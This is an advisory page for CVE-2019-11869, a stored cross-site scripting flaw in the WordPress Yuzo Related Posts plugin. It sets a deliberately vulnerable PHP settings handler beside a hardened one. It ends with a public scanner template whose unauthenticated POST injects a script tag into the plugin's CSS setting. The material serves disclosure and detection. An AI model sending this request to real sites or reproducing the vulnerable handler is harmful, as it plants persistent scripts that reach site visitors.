CVE-2019-11869: WordPress Yuzo <5.12.94 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: WordPress Yuzo | PoC: public

Vulnerability description

WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting because it mistakenly expects that is_admin() verifies that the request comes from an admin user (it actually only verifies that the request is for an admin page). An unauthenticated attacker can consequently inject a payload into the plugin settings, such as the yuzo_related_post_css_and_style setting.
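To make the root cause concrete, here is an added illustration (not Yuzo's actual source) of the is_admin() misuse beside a hardened settings handler. Function names, the nonce action and the hook placement are assumptions; the option name is the one from the advisory, and the vulnerable variant is assumed to run at plugin load, before WordPress's login redirect for wp-admin pages, which is what makes it reachable without authentication.

```php
<?php
// Added illustration, not the Yuzo plugin's own code. Handler names and the
// nonce action are assumptions; the option name comes from the advisory.

// VULNERABLE pattern: is_admin() is true for *any* request whose path is under
// /wp-admin/, authenticated or not. It says nothing about who the user is.
// Assumed to run directly at plugin load (no hook), i.e. before auth_redirect().
function yuzo_like_save_settings_vulnerable() {
    if ( is_admin() && isset( $_POST['yuzo_related_post_css_and_style'] ) ) {
        // Raw, unsanitized value is stored and later echoed inside <style>.
        update_option( 'yuzo_related_post_css_and_style',
            $_POST['yuzo_related_post_css_and_style'] );
    }
}
yuzo_like_save_settings_vulnerable();

// HARDENED pattern: capability check, CSRF nonce, input sanitization, and
// execution on admin_init (after WordPress has already required a login).
function yuzo_like_save_settings_hardened() {
    if ( ! isset( $_POST['yuzo_related_post_css_and_style'] ) ) {
        return;
    }
    // 1. Authorization: only users allowed to manage options may save them.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }
    // 2. CSRF: the form must carry the nonce emitted by
    //    wp_nonce_field( 'yuzo_like_save_settings' ) on the settings page.
    check_admin_referer( 'yuzo_like_save_settings' );

    // 3. Sanitize for the output context: the option is CSS and must never
    //    contain markup, so tags (and a stray </style) are removed.
    $css = wp_unslash( $_POST['yuzo_related_post_css_and_style'] );
    $css = str_ireplace( '</style', '', wp_strip_all_tags( $css ) );
    update_option( 'yuzo_related_post_css_and_style', $css );
}

// Output side: re-apply the same filter at render time so a value stored
// before the fix cannot reach visitors as markup.
function yuzo_like_print_custom_css() {
    $css = (string) get_option( 'yuzo_related_post_css_and_style', '' );
    $css = str_ireplace( '</style', '', wp_strip_all_tags( $css ) );
    echo "<style id=\"yuzo-like-custom-css\">\n" . $css . "\n</style>\n";
}

add_action( 'admin_init', 'yuzo_like_save_settings_hardened' );
add_action( 'wp_head', 'yuzo_like_print_custom_css' );
```

On a site that ran the vulnerable version, the stored option should be inspected and cleared as well as the plugin updated, since the update alone does not remove a payload that was already saved.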

PoC code [public]

id: CVE-2019-11869

info:
  name: WordPress Yuzo <5.12.94 - Cross-Site Scripting
  author: ganofins
  severity: medium
  description: |
    WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting
    because it mistakenly expects that is_admin() verifies that the
    request comes from an admin user (it actually only verifies that the
    request is for an admin page). An unauthenticated attacker can consequently inject
    a payload into the plugin settings, such as the
    yuzo_related_post_css_and_style setting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability.
  reference:
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
    - https://wpscan.com/vulnerability/9254
    - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/
    - https://wpvulndb.com/vulnerabilities/9254
    - https://nvd.nist.gov/vuln/detail/CVE-2019-11869
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-11869
    cwe-id: CWE-79
    epss-score: 0.06548
    epss-percentile: 0.90776
    cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: yuzopro
    product: yuzo
    framework: wordpress
  tags: cve,cve2019,wpscan,wordpress,wp-plugin,xss,yuzopro

http:
  - raw:
      - |
        POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        yuzo_related_post_css_and_style=</style><script>alert(0);</script>
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<script>alert(0);</script>")'

      - type: dsl
        dsl:
          - "contains(tolower(header_2), 'text/html')"
# digest: 4b0a004830460221009857c21a4bd9c9c6e5a1c7b927017409bf4284fe551bb40292a8285d672ba8c70221009212cb9cb99475558759342211736589b04fdd767571076dbe7dbd758644b189:922c64590222798bb761d5b6d8e72950
